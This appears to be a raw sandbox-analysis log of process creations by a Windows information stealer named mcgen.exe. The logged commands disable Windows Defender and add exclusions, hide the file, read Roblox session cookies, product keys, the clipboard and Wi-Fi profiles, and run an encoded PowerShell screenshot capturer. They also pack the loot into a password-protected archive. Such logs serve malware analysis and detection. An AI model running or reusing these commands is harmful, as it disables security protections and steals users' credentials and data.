Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\mcgen.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8ED.tmp" "c:\Users\user\AppData\Local\Temp\ppw2wipr\CSC774215641B8D46CBA5382B343227E316.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand 